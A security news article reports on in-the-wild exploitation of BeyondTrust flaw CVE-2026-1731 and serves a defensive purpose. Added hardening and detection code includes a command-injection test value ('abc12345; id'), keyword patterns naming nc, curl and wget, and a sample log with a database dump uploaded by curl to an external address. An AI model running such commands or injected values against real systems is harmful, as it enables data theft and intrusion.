BeyondTrust Flaw Used for Web Shells, Backdoors, and Data Exfiltration
Source: The Hacker News
BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA) products are being actively exploited in the wild through a critical flaw identified as CVE‑2026‑1731 (CVSS 9.9). The vulnerability allows attackers to execute operating‑system commands in the context of the site user via the “thin‑scc‑wrapper” script reachable through a WebSocket interface.
Vulnerability Overview
- CVE‑2026‑1731 – Sanitization failure in the “thin‑scc‑wrapper” script.
- Exploits a WebSocket endpoint to inject and run arbitrary shell commands.
- While the compromised account is not the root user, it grants control over the appliance’s configuration, managed sessions, and network traffic.
[Image: BeyondTrust appliance]
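The bug class behind a "sanitization failure" of this kind, as an added example that is not BeyondTrust's code and does not reproduce the real thin-scc-wrapper: the `WRAPPER` path, the `--session` option and the session-id format are assumptions. It contrasts interpolating a client-supplied value into a shell string with an allowlist check followed by an argv-based call that never goes through a shell.

```python
"""Hardened command construction: allowlist plus argv, never a shell string.

Added illustration, not BeyondTrust's code; it does not reproduce the real
thin-scc-wrapper.  It contrasts the anti-pattern behind the bug class
(interpolating a client-supplied value into a shell command line) with an
allowlisted, argv-based invocation.  WRAPPER, the "--session" option and the
session-id format are all hypothetical.
"""
import re
import shlex
import subprocess
from typing import List

WRAPPER = "/opt/example/session-wrapper"           # hypothetical helper binary
SESSION_ID_RE = re.compile(r"[A-Za-z0-9-]{8,40}")   # hypothetical id format


def build_unsafe_command_line(session_id: str) -> str:
    """Anti-pattern: the value lands in a shell string unchanged, so any
    shell operator it carries would be interpreted.  Returned, never run."""
    return f"{WRAPPER} --session {session_id}"


def is_accepted(session_id: str) -> bool:
    """Allowlist check: only the characters the protocol needs, nothing else."""
    return SESSION_ID_RE.fullmatch(session_id) is not None


def build_safe_argv(session_id: str) -> List[str]:
    """Validate first, then pass the value as its own argv element.  With
    shell=False there is no shell parse, so metacharacters are inert."""
    if not is_accepted(session_id):
        raise ValueError("session id rejected by allowlist")
    return [WRAPPER, "--session", session_id]


def run_wrapper(session_id: str) -> subprocess.CompletedProcess:
    """Invoke the helper via argv.  Not called in the demo below because
    WRAPPER does not exist on the reader's machine."""
    return subprocess.run(build_safe_argv(session_id), shell=False,
                          capture_output=True, text=True, check=False)


def shell_quoted_command_line(session_id: str) -> str:
    """Last line of defence when a shell cannot be avoided: shlex.quote()
    turns the value into one literal word.  The allowlist should still run
    first; quoting alone is not a substitute for validation."""
    return f"{WRAPPER} --session {shlex.quote(session_id)}"


if __name__ == "__main__":
    tainted = "abc12345; id"          # constructed value carrying a shell operator
    print("unsafe  :", build_unsafe_command_line(tainted))
    print("quoted  :", shell_quoted_command_line(tainted))
    print("accepted:", is_accepted(tainted), is_accepted("session-0123abcd"))
    print("argv    :", build_safe_argv("session-0123abcd"))
```

The allowlist is deliberately the tightest pattern the protocol can live with; rejecting early is cheaper and safer than trying to escape whatever arrives, and the argv form removes the shell from the path entirely.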
Exploitation in the Wild
Palo Alto Networks Unit 42 reported that threat actors are leveraging CVE‑2026‑1731 for:
- Network reconnaissance and lateral movement.
- Deployment of web shells and backdoors.
- Installation of remote‑management tools such as VShell and Spark RAT.
- Data exfiltration, including configuration files, internal databases, and full PostgreSQL dumps.
The campaign targets organizations in financial services, legal services, high‑technology, higher education, wholesale & retail, and healthcare across the United States, France, Germany, Australia, and Canada.
Attack Techniques
- Custom Python script – Gains access to an administrative account.
- Web shell deployment – Multiple shells placed in various directories, including a PHP backdoor capable of executing raw PHP code without writing files, and a Bash dropper establishing a persistent shell.
- Malware installation – VShell and Spark RAT are dropped onto compromised systems.
- Out‑of‑band application security testing (OAST) – Used to verify successful code execution and fingerprint compromised hosts.
- Data staging & exfiltration – Commands are run to compress and transfer sensitive data to external servers.
[Image: Bash command execution]
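A detection rule for the staging-and-exfiltration step described above, as an added example that is not from the article or from Unit 42. It scans constructed command-audit lines for the three stages the article names (database dump, archive, outbound transfer) and alerts when one host/user pair sends data to an address outside an assumed internal range shortly after a dump or archive step. The stage keywords, the internal ranges and the time window are assumptions to tune per site.

```python
"""Flag a dump-compress-transfer sequence in command audit logs.

Added example, not from the article or from Unit 42.  It scans constructed
audit lines of the form "<UTC timestamp> <host> <user> <command>" and raises
an alert when one host/user pair transfers data to an address outside the
assumed internal ranges within a window after a dump or archive step.
"""
import ipaddress
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Set

DUMP_RE = re.compile(r"\b(pg_dump|pg_dumpall|mysqldump)\b")
ARCHIVE_RE = re.compile(r"\b(tar|zip|gzip|xz|7z)\b")
TRANSFER_RE = re.compile(r"\b(curl|wget|scp|rsync|nc|ncat)\b")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Assumed internal address space; anything else counts as external.
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
WINDOW = timedelta(minutes=60)   # assumed correlation window

# Constructed sample log; the external address is a documentation range.
SAMPLE_LOG = """\
2026-02-10T09:01:12Z appliance01 siteuser pg_dump -U postgres -d support -f /tmp/.cache/db.sql
2026-02-10T09:02:40Z appliance01 siteuser tar czf /tmp/.cache/out.tgz /tmp/.cache/db.sql /etc/appliance
2026-02-10T09:03:05Z appliance01 siteuser curl -s -T /tmp/.cache/out.tgz http://198.51.100.23/u
2026-02-10T11:15:00Z appliance01 backup tar czf /var/backups/daily.tgz /var/lib/config
2026-02-10T11:16:00Z appliance02 siteuser pg_dump -U postgres -d support -f /tmp/db.sql
2026-02-11T08:00:00Z appliance02 siteuser scp /tmp/db.sql ops@10.0.0.5:/backup/
"""


def parse_line(line: str):
    ts, host, user, command = line.split(" ", 3)
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), host, user, command


def stages_of(command: str) -> Set[str]:
    """Which staging stages a single command line exhibits."""
    stages = set()
    if DUMP_RE.search(command):
        stages.add("dump")
    if ARCHIVE_RE.search(command):
        stages.add("archive")
    if TRANSFER_RE.search(command):
        stages.add("transfer")
    return stages


def external_addresses(command: str) -> List[str]:
    """IPv4 literals in the command that fall outside INTERNAL_NETS.
    Hostnames are not resolved here; a production rule would add DNS data."""
    found = []
    for literal in IPV4_RE.findall(command):
        try:
            addr = ipaddress.ip_address(literal)
        except ValueError:          # e.g. 999.1.1.1 has the regex shape only
            continue
        if not any(addr in net for net in INTERNAL_NETS):
            found.append(literal)
    return found


def find_staging_sequences(log_text: str, window: timedelta = WINDOW) -> List[Dict]:
    """One alert per external transfer that follows a dump or archive step
    by the same host/user within `window`."""
    history = defaultdict(list)     # (host, user) -> [(timestamp, stage)]
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, host, user, command = parse_line(line)
        stages = stages_of(command)
        key = (host, user)
        if "transfer" in stages:
            targets = external_addresses(command)
            if targets:
                prior = {s for t, s in history[key]
                         if timedelta(0) <= ts - t <= window}
                prior |= stages - {"transfer"}   # dump piped straight into a transfer
                if prior:
                    alerts.append({
                        "host": host, "user": user, "time": ts.isoformat(),
                        "stages": sorted(prior) + ["transfer"],
                        "destination": targets, "command": command,
                    })
        for stage in stages:
            history[key].append((ts, stage))
    return alerts


if __name__ == "__main__":
    for alert in find_staging_sequences(SAMPLE_LOG):
        print(alert)
```

Run against the sample, only the appliance01 sequence fires: the backup user's archive has no transfer, and the appliance02 copy goes to an internal host a day later. Keying on host and user rather than host alone keeps a legitimate backup job from being correlated with a different account's transfer.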
Related Vulnerabilities
The report highlights a connection between CVE‑2026‑1731 and CVE‑2024‑12356, another input‑validation flaw affecting BeyondTrust products:
- CVE‑2024‑12356 – Insufficient validation in third‑party PostgreSQL components.
- Both vulnerabilities stem from localized validation issues in distinct execution pathways.
“CVE‑2024‑12356’s insufficient validation was using third‑party software (Postgres), while CVE‑2026‑1731’s insufficient validation problem occurred in the BeyondTrust Remote Support (RS) and older versions of the BeyondTrust Privileged Remote Access (PRA) codebase.” – Unit 42
CISA KEV Catalog Update
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE‑2026‑1731 to its Known Exploited Vulnerabilities (KEV) catalog, confirming exploitation in ransomware campaigns.